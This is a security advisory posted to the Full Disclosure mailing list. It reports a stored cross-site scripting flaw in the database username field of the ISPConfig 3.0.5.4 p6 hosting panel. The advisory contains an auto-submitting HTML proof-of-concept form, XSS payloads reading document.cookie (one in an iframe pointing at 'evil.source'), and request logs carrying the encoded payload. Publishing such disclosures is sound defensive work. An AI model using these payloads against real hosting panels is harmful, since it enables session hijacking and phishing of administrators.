[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] ISPconfig v3.0.5.4 p6 - UI Exception & XSS Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2016-08-22 12:56:29
Message-ID: 37272159-4cac-11bf-1ea6-d12dad692e89 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
ISPconfig v3.0.5.4 p6 - UI Exception & XSS Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1909
Release Date:
=============
2016-08-16
Vulnerability Laboratory ID (VL-ID):
====================================
1909
Common Vulnerability Scoring System:
====================================
3.5
Product & Service Introduction:
===============================
ISPConfig 3 is an open-source server administration software for Linux and allows the \
management of one or more servers through a web-based front end. ISPConfig runs under the bsd \
open source license.
(Copy of the Vendor Homepage: http://www.ispconfig.de/ispconfig-3/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a stored cross site scripting \
vulnerability in the ISPconfig v3.0.5.4 p6.
Vulnerability Disclosure Timeline:
==================================
2016-08-16: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
ISPConfig UG
Product: ISPconfig - Hosting Service Panel (Web-Application) 3.0.5.4 p6
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A cross site scripting vulnerability has been uncovered in the official ISPconfig v3.0.5.4 p6 \
hosting panel web-application. The vulnerability allows remote attackers to inject own \
malicious script codes to the application-side of the vulnerable module.
The cross site vulnerability is located in the `database username` input field of the database \
user module. The form of the add POST method request is not secure parsed by the basic \
validation. Thus allows to trigger a xss issue in the the edit form of the special crafted \
database username. The second execution point is located the exception-handling of the invalid \
input context. The exception-handling replies with the input of the invalid database username \
after an add was processed. The request method to inject is POST and the attack vector of the \
issue remains to the application-side of the service. The error exception issue is located to \
the client-side of the service and does not occur permanently. Due to the non protected session \
credentials an attacker is easily able to perform a malicious request by usage of a prepared \
web-link or web-page.
The security risk of the xss vulnerability is estimated as medium with a cvss (common \
vulnerability scoring system) count of 3.3. Exploitation of the client-side vulnerability \
requires no privileged web-application user account and only low user interaction. Successful \
exploitation of the vulnerability results in non-persistent phishing attacks, session \
hijacking, non-persistent external redirect to malicious sources and non-persistent \
manipulation of affected or connected web module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] ./sites/
Vulnerable File(s):
[+] database_user_edit.php
Vulnerable Parameter(s):
[+] Edit Formular
[+] Invalid Exception-Handling
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without privileged user account and with \
low user interaction. For security demonstration or to reproduce the vulnerability follow the \
provided information and steps below to continue.
PoC: Exploitation via Database_User
<html>
<head><title>PoC: Database_User Exploitation</title>
<style type="text/css">
#nodisplay {
display:none;
}
</style>
</head>
<body>
<div id="nodsiplay">
<form action="database_user_edit.php" method="post">
<input type="database_user" id="database_user" \
value="><script>alert(document.cookie)</script><div style=1"/> </form>
</div>
<script>
function submitForm() {
document.forms[0].submit();
}
submitForm();
</script>
</body>
</html>
PoC: (Execution) Database Users (Database Username Exception-Handling)
<li>Database username - c1>"<img>%>"<iframe src="evil.source" \
onload="alert(document.cookie)" <="" -="" too="" long.="" the="" max.="" database="" \
username="" length="" incl.="" prefix="" is="" 16="" chars.<br=""></iframe> Invalid database \
user name. The username may contain these characters: a-z, A-Z, 0-9 and the underscore. \
Length: 2 - 64 characters.<br></li>
... followwed by an execute in the edit form next to the vulnerable username input.
<div class="ctrlHolder">
<label for="database_user">Database user</label>
<p class="prefix">c1</p>
<input name="database_user" id="database_user"
value=">" <img="">%>"<iframe src="a" onload="alert(document.cookie)" <"="" size="30" \
maxlength="255" type="text" class="textInput formLengthHalf"></iframe></div>
--- Error Exception Logs ---
Database username - c1>"%>" - Invalid database user name. The username may contain these \
characters: a-z, A-Z, 0-9 and the underscore. Length: 2 - 64 characters.
Note: The injected code replied in the exception message context via add or edit.
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://ispconfig.localhost:8080/sites/database_user_edit.php
Mime Type[text/html]
Request Header:
Host[ispconfig.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.2; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0]
Content-Type[application/x-www-form-urlencoded]
X-Requested-With[XMLHttpRequest]
Referer[http://ispconfig.localhost:8080/index.php]
Cookie[__cfduid=d94df75150c7b17ad6ba57ce9d44d51661471192388; \
PHPSESSID=o2e0dfu9h7h896m4sj3m4jg0j1] Connection[keep-alive]
POST-Daten:
client_group_id[2]
database_user[%3E%22%3Cimg%3E%25%3E%22%3Ciframe+src%3Da+onload%3Dalert(document.cookie)+%3C]
database_password[]
repeat_password[]
id[]
next_tab[]
phpsessid[o2e0dfu9h7h896m4sj3m4jg0j1]
Response Header:
Server[Apache/2.2.0 (Fedora)]
X-Powered-By[PHP/5.4.45-0+deb7u4]
X-Mod-Pagespeed[1.9.32.14-0]
Connection[Keep-Alive]
Content-Type[text/html; charset=utf-8]
-
Status: 200[OK]
GET http://ispconfig.localhost:8080/a[EXECUTE OF SCRIPT CODE!]
Mime Type[text/html]
Request Header:
Host[ispconfig.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.2; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0]
Referer[http://ispconfig.localhost:8080/index.php]
Cookie[__cfduid=d94df75150c7b17ad6ba57ce9d44d51661471192388; \
PHPSESSID=o2e0dfu9h7h896m4sj3m4jg0j1] Connection[keep-alive]
If-None-Match["55e1898-70e-48fe6cb2fcc40"]
Response Header:
Server[Apache/2.2.0 (Fedora)]
Etag["55e1898-70e-48fe6cb2fcc40"]
Connection[Keep-Alive]
Content-Type[text/html]
Reference(s):
http://ispconfig.localhost:8080/
http://ispconfig.localhost:8080/index.php
http://ispconfig.localhost:8080/sites/
http://ispconfig.localhost:8080/sites/database_user_edit.php
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse of the database username input field. Filter \
the input by disallowing the usage of special chars. Parse the exception-handlung and edit \
form output locations were the input executes permanently.
Security Risk:
==============
The security risk of the stored xss and client-side exception issue are estimated as medium. \
(CVSS 3.5)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri \
(http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any licenses, \
policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list, modify, use or \
edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic